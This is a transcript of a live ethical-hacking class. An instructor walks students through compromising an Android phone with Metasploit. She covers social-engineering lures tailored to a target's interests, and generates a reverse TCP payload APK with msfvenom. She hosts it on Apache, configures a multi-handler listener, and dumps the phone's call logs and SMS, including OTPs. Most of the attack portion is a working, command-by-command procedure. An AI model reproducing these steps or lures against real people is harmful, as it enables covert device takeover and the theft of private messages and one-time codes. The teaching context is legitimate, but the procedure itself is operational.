See, social engineering word is used in the hacking, like in the cybersecurity field. Social engineering means to read, to understand the behavior of the human. Okay, how this person is reacting towards what thing. Suppose if I'm talking about the Rudransh. So Rudransh like PUBG game. Okay, and if I made a PUBG link. Okay, and with that PUBG link, I put my payload in that and I send it to the Rudransh. So what will happen? It will appear that when you click on this link, so you will get the point in your game, and you can have some extra tools, or maybe I never played the PUBG game, so maybe you will get some. What is that in PUBG game? Some points, some extra points if you click on that link. So there will be some temptation, so that tempt the Rudransh to click on that link. So that is totally depend upon the social engineering. Suppose the PUBG game triggered the Rudransh to click on this link. But if I talk about the Swara is more into coding thing. Okay, so that thing will tempt the Swara to click on that link. And if I create a link and fetch my payload in that link, and I send it to the Swara, and in that the message will be like, if you click on the link, so you will get the access of that XYZ course, in which you get 1 year access, and you can talk to the trainer personally, and you can take the classes, and whenever you find any problem in solving any question, you can directly message to the trainer. Okay, so this may tempt the Swara to click on that link. But on the other hand, what will tempt the Rudransh to click on that link? Maybe that PUBG game or the Candy Crush game. Okay, so it's totally depend upon the reconnaissance, like what you are finding about the target. So during the reconnaissance that you find about Rudransh that he likes the PUBG game most, and you find about the Swara that she likes the coding most. And if I talk about the Pankhi, maybe Pankhi like the more practical, and to know about the more vulnerability, what kind of vulnerability in the cybersecurity. Okay, so maybe the different things may trigger or tempt different persons. Okay, so it's totally depend upon the social engineering or the behavior of the person. So it's totally depend upon the attacker how he made the target to click on that link. Is this clear?
Yes.
Okay. So just wait a minute. I'm just stop sharing. I have a file for that. So I'll share you the Word file, so that after the class you can refer that Word file and practice that. Okay. So I have created that file in which all the commands will be available there. You can refer that file to practice the mobile hacking. So I'm sharing screen again. So now start the Metasploit framework. So by using the command msf console, And I'm just hitting the tab to auto-complete it and hit enter. So see, my Metasploit framework is starting. By using the command msf console. Okay, let me open my text editor as well. Okay, so see, this is the banner thing. So whenever you start your Metasploit, this banner will always change. Okay. And when I come, if I come to this, so this is the version of Metasploit that is version 6, 3.16. And these are the modules of Metasploit. It has 2315 exploits, 1208 auxiliary, 412 post, 975 payloads, 46 encoder, 11 knobs, and 9 evasion. Okay, and if I want to, like in this, we are going to cover the exploit and the payloads. And the others you is helpful when you take the control of any system. So that is used in the post exploitation. Okay, so if you want to see how many exploits are available here and how many payloads are there, so there is a command for that, that is show and then payloads. Suppose I want to see the payloads. So this is the list of payload which is available in this Metasploit. And if I want to see the exploit, so the command is show exploit. Hit enter. So these are the exploits which are available in this. So if I do show payloads, sorry. So see, there are different payloads which are for the Windows, and you can see there are payloads for the, there are all payloads for the Windows. And see, there's a PHP payloads, there are Python payloads, and there are OS X payloads, there are Linux payloads, and there are Windows payload, Java payloads were there. Uh, and Unix payload is there. And there are payloads which are related to the Android. So we are going to use the Android payload. Okay, so now how we are going to create a payload. So first, let me open the new tab and start it again. Why I'm starting this again? Because it becomes so messy. That's why it start it in a new tab. Okay, so I'm using MSF Venom to create the payload. Okay, so after MSF Venom, I'm giving it -p. Why -p? To indicate that I am using the payload. And then I am giving the name of the payload, what payload I am using. So what payload I am using? I am using this payload. That is Android Interpreter Reverse TCP. Okay, copy and paste. And then I am giving the lhost. Lhost means I'm giving the IP address of my device. So how can I find the IP address of my device? Tell me. What is the command for that?
ifconfig.
ipconfig.
IP configure branch.
It was for showing this data na. Sorry, showing this.
IP is for the Windows.
Acha, हाँ.
इससे पहले
if
जिसने बोला था
config.
ठीक बोला था. Yes, if config. So hit enter. So you can see this is the IP address of my Kali machine. Okay, so see, make sure that your mobile device and your Kali Linux both are on the same network. Okay, connected to the same network. So this is my IP. Let's copy this IP and paste it here. After the L host, I am giving the L port. So L port is with to which port I want to connect. So L port. So L port, suppose I want to connect 1, 2, 3, 4. And then I'm giving the R greater than sign and the name of my APK file. Suppose I want to give the name. Let me check, is there any virus.apk or not? Okay, so you guys tell me if I want to check whether this file virus.apk file is already there or not in this directory. So how can I check it?
ls.
ls.
Yes, right, right, Paritosh, right, Rudransh. So ls. So yes, virus.apk is here. So let's create the file with the other name. Suppose
How do we
lc.
get a virus.apk, that file?
क्या?
How did you get that virus.apk?
With this command, I created this virus.apk.
Oh,
I'll show you. You will see here kelsey.apk. Okay. So this is my command. Copy this command and paste it to the Metasploit. Okay. I have to put equals to. Now hit enter. So see, my APK file is creating. My payload is creating basically. See, this file is created. Okay. So now I want to check. So I'm using ls. So you can see kelsey.apk is created. This payload is created. Clear till now, everyone?
yeah.
Yes, ma'am.
Okay, good. So if I want to share this with the help of my Firefox, so how can I share this file? If anyone write my IP address into his laptop, suppose in the Google Chrome or the Firefox. Okay, if a person near my network, in my network, open its Firefox and write my IP address. Suppose this is my IP address slash directory name and hit enter. So how he can access all the files? Okay, with the help of the Apache server, I can use my IP address or the directory to show the files and the folder on the local network. So what I'm going to use? My Apache service. Okay. So if you want to show something like if you want to share the file in a folder in a local network, so you can use the Apache service for that. Okay, so you will understand what I'm doing and what I'm trying to say you. So to open the Apache, so what is the command? That is a service. Then the name of the server that you want to use, that is Apache 2. And then first you want to see the status, whether my Apache is started or not. So stay Just simple. Service, you want to start the service. What? Apache service, and you want to see the status of that service and hit enter. So see, this service is disabled. And if I want to see the other services also, what are the services which are available in the Kali Linux, and I want to know the status of that services. So what is the command? The command is service and then hyphen status hyphen all. All means all the services which are running or not running in this Kali Linux, which are available in this Kali Linux. So these are the list of the services, the status of the services which are available in this Kali Linux. So see, where you are seeing this minus sign, it means this service is stopped, and where you are seeing this plus sign, it means this service is running at this time. Okay, so you can see minus is before Apache 2, and I want to run this. I want to start this service. So the command is service. Sorry, my spelling is wrong. Then Apache 2, what service you want to run, and then you want to start it, so simple write start and hit enter. So see, it is asking me for the password. So what is the password I'm going to write here? So the password which I created at the time of installation, or the password which I uh, give it to the Kali Linux when I switch from the normal user to the root user, that password I'm writing here and hit enter. So see, and I want to check it again whether my service is started or not. So I want to see the status, and you can see active running. Okay, so my IP address was this. And if I copy this IP address and put it here and hit enter, so you can see the default page of Apache. Okay, now what you want to do, you want to share your files in the folder using these services. Okay, so you have to add some directory after that. Suppose I'm creating the share directory. So you have to first create this directory. Then you can access the file and the folder. So what you are going to do for that, all the, like if you want to show anything on the web page, so there is a directory for that, that is a var. You have to go to cd/var. Why slash? Because this var folder is available in the root. If you want to see, then you can check. Where is var? Can anybody can see where is var?
It is beside temp.
Here. Yes, var. Okay. So cd var and hit enter and do ls. In the ls, what you want to access? You want to access this. Okay, so www, in this www, so cd www, hit enter and do ls, and you want to access the HTML page. Okay, so cd HTML, hit enter, do ls. So here, let me remove this first. Okay, if I want to remove the share folder, what command can I use? And in the share folder, the file is already available. So how can I remove this directory? Share directory. What is the command for that? Anyone?
RM RF share.
RM what?
RF share.
RF nahi. I. And then cannot remove. Okay, I need the root access. Okay. Oh, RM-R and then share, hit enter. So do ls. So there is no folder name with the share. Right. Now I want to create This share folder I have created earlier. Okay, that's why I remove it. So originally, if you go to this HTML, those both file will be available. And now here I want to add the directory. So how can I create a directory? What is the command to create the directory?
mkdir.
Exactly, mkdir. And I want to create the directory name share. And I want to go to the share directory. How can I go?
cd share.
Yes, cd share. Hit enter and do ls, there is nothing. And I want to copy this kelsey.apk to this directory, to this path. How can I do that? Tell me. What command can I use to copy this kelsey.apk from here to here? Yes, tell me. I need the sudo permission for that.
cp.
Yes, tell me. CP. Then please tell me whole command. Not only what command can we use, the whole command to copy. I
CP,
just want.
the name of the file you want to copy, and then
Yes.
the name of the file in which you want to copy it.
Name of the file or name of the
Whole
path
at
where I want to copy.
whole
Direct
path.
folder.
Yes, direct path. So my path is var
Slash where
www html and where in the HTML share folder. Hit enter and you can check here, do ls. So see, lc.apk is here. Now, if you write after the IP address /share and hit enter. So see, this file is available here. Only those files will be shown in this /share in the Firefox, which you allow. Okay, which you allow under this path. If I add some other folder there, so that folder will also be available there, here. Okay, understand what I did here? Any doubt till now? Anyone? Disha, Divyam, Dia, Ishan, Lakshya, Lavanya,
What
Paritosh,
type of
Rehan.
virus exactly that Calci is? Meaning, I didn't understand what will that virus do.
It's a payload. If I download this payload in my
Hmm.
mobile device, then
Hmm.
this payload create a kind of vulnerability which I'm going to exploit it with the help of Metasploit framework.
Oh.
And if I write this whole thing, like whoever is available on my network, okay, whoever is connected with my service provider right now in my network, whoever is available in my network, if that person write this thing in the Firefox or their Google Chrome, my IP address /share, so he or she can access this folder. Okay, this is what I'm going to do right now. I am writing this. I am just going open my mobile. Okay, and I will open Google Chrome in my mobile device and I'm going to write this IP address and /share. Okay, the same page will appear on my screen and I'm going to download that kelsey.apk in my mobile device. So let's see first, is it connected with the same network or not? It's not. Let me connect my mobile device with the same network.
But how can we trick that person to download that file?
Did that what I explained you na with the example of PUBG and coding and that
Yeah,
cybersecurity vulnerabilities.
that
So,
That you told
it's
me. But
hmm,
for example, you want a person that if I click on the particular link and then a
hmm,
file automatically starts to download.
hmm.
How can you do that?
No, देखो, what happened? I'm now answering the Arigna's question. He asked me when I was doing SQL injection. So see, what is actually happening in the real life? What hacker are doing? They made some application and they attach their APK file with that application. Suppose I created the PUBG game. That is a third. That's why we are all cybersecurity experts are saying please don't download third party application. Why? Because this may happen that with that application, with the third party application, some viruses attached with that. Okay, and like you don't know unknowingly without your knowledge that hacker is extracting your information, and I'll show you what information he can extract, or she can extract, the hacker can extract. Okay, so it's totally depend. Like you go to the Play Store and there is application available with the name of Candy Crush. Okay, and like द कैंडी क्रश गेम अभी बहुत फेमस हुआ था, ठीक है, इससे पहले एक और कोई गेम था जो बहुत ज्यादा फेमस हुआ था, ठीक है, तो ऑल ऑफ द मे बी 90% ऑफ द पीपल इन इंडिया आर प्लेइंग दैट कैंडी क्रश गेम. So what the hacker are doing, they made this game available on the Play Store. People are going on the Play Store and download that application. What they did, the hacker did, they attached the payload along with that application, but the people who are downloading it, they know that we are downloading the Candy Crush. But actually what they are downloading, they are downloading the Candy Crush game, no doubt. Along with that, they are downloading the APK file. They are giving the permission to the APK file in their mobile devices, because there is a process of downloading the application. You have to give the permission to that application, right?
Yeah.
So in the real life, what actually happening, along with the third party application, the attacker is attaching their payload with that application and they made available on the internet. I hope I clear your doubt.
Yeah.
Okay. Okay, give me a second. Let me connect my mobile devices. Okay. Now it is connected. I'm opening Chrome. See, I'm showing you this Apache for the demo purpose, right? Because I'm doing on my own device. But if this thing is happen in the real life, so this happen mostly in the third party application.
Yeah.
Like 168. What is my IP? 168.29.218. Okay. Okay, it is disconnecting again and again. I'm facing some issue with my Wi-Fi connection. Actually, my mobile is again and again disconnecting. Okay, my Wi-Fi is not connecting to my mobile device. What can we do now? Poor network. Okay, fine. My mobile device is not connecting right now. So, okay. So, okay, when I download this kelsey.apk on my mobile device, so what further steps we can do? So after that, we have to set the payload and we have to use the exploit. So what exploit we are going to use? We are going to use the exploit multi-handler. Okay. So I have already showed you the command to see the exploit. So that is a show exploits. So we are going to use the multi-handler exploit. The command is use and then exploit and then multi slash handler. Okay, hit enter. So we are at exploit multi-handler. And then what we have to do here, we have to set the payload and all these things. So show payload, sorry, show payloads, nahi, show options and hit enter. So these are the options. See, the payload is not set yet. The L host is not set and the L port is not set. So what we have to do, we have to set all these things. So what is the command to set the payload and the L host and the L port? So the command is set L host and the IP address of my Kali Linux, that is ifconfig, that is 192.168.29.218. Copy and let's paste it here. So hit enter. So you can see L host is set to 192.168.29.218. And now what I have to do, I have to set the L port. So what port I used at the time of creating the payload? The port is 1234. Okay, so the command is set L port and 1234. Hit enter. So you can see L port is set here. And now I have to set the payload. So set payload. And what was my payload? My payload was this: Android interpreter reverse TCP, copy, and then paste. Oh, sorry. Okay, and hit enter. So see, my payload is set. And if I want to recheck it, so the command is show options, hit enter. So you can see the payload is set to Android interpreter, L host is set, and my L port is set. Now the only command that you have to run is the run command and hit enter. So when like my mobile is not connecting to the Wi-Fi, so once the application is downloaded in your mobile device, so what will happen? You have to click on that application. See, nothing will happen on the screen. So the application will not react because you are just viewing the APK file, and you have to just click on it and you will get the interpreter shell. When you get the interpreter shell, then you have to use this question mark, and when you click on this question mark, whole the options which are available in the Metasploit is available. So I can show you. Wait. Wait a second. Okay. There's my dates. Okay. So when you write the help or when you use this question mark sign, is my screen visible to everyone?
Yeah.
Okay. So when you click on this question mark sign, when you write this question mark on the Kali Linux, right here, when you use this question mark sign or write help, so what will happen? This options will appear on your screen. Okay. So what this is a free version. See, so all the option may not work properly, but I have some files, TXT file, which I've used and I have in my system. I can show you. Okay, and you can see all these options. So I'll share you the previous class, like another batch recording. So in which whole process will be there. Okay, I'll download this today's class recording and the previous batch recording so that you can see what actually is happening and how it happened. Okay, so I can open the webcam using the webcam option. So just what I have to write, I have to simply write the webcam, and I can also access the call logs of that mobile device. I can also access the context list of that mobile device. I can access the SMS list of that mobile device, and you can also the geolocation of that mobile device. You can practice it by yourself, and you can see whether the location is available to you or not. So sometimes what happen, the some options may work at a time, and if you try it another time, they may not work properly because it's a free version. That's why it happened in this Metasploit. If I show you, I have maybe some txt file. Yes, I have. Okay, so I have done the call log or the SMS from this Metasploit, and I simply use the command call log dump. I simply write here call log underscore dump. This was my command, and when I hit enter, so I get this txt file. Now I want to read this txt file. So what is my command to read that txt file? Anyone?
Cat.
Yes,
Cat.
cat call log. So you can see this is my call log. This is showing that this is a missed call and the day and the time of that call and the name of the person and the number, right? So this is all the call logs which are available in that mobile device. And if we want to see the SMS, so the command was do ls. So the command was SMS underscore dump. Okay. So when I write SMS underscore dump and hit enter, so I get this txt file. When I hit enter, so you can see this is the incoming message and the address who sent this message and the date and the time when I get this message and the whole message. You can also receive the OTPs here, right? You can, with the help of this, you can guess at what time this particular target is active on his or her mobile device. So at that time, you can run your exploit, or you can do this mobile hacking. Okay. So with the help of all this thing, you can gather the information, what is the OTP, which person contact him the most, to whom he or she is talking, and the list of the contact details in his or her mobile device, and you can also guess what is the uptime, or what is the exact time this person is mostly using his or her mobile device or using that particular game or